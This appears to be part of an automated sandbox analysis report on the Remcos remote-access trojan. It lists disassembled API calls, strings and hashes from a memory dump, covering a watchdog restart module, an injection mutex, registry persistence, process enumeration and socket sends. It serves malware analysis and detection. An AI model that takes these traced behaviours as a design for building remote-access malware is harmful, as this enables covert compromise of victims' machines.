                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 75b27c31078e803c67561eca8991e92f08cf1f46e7f1a7dd6019d3f2d77241c9
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 75b27c31078e803c67561eca8991e92f08cf1f46e7f1a7dd6019d3f2d77241c9
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A2F, Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
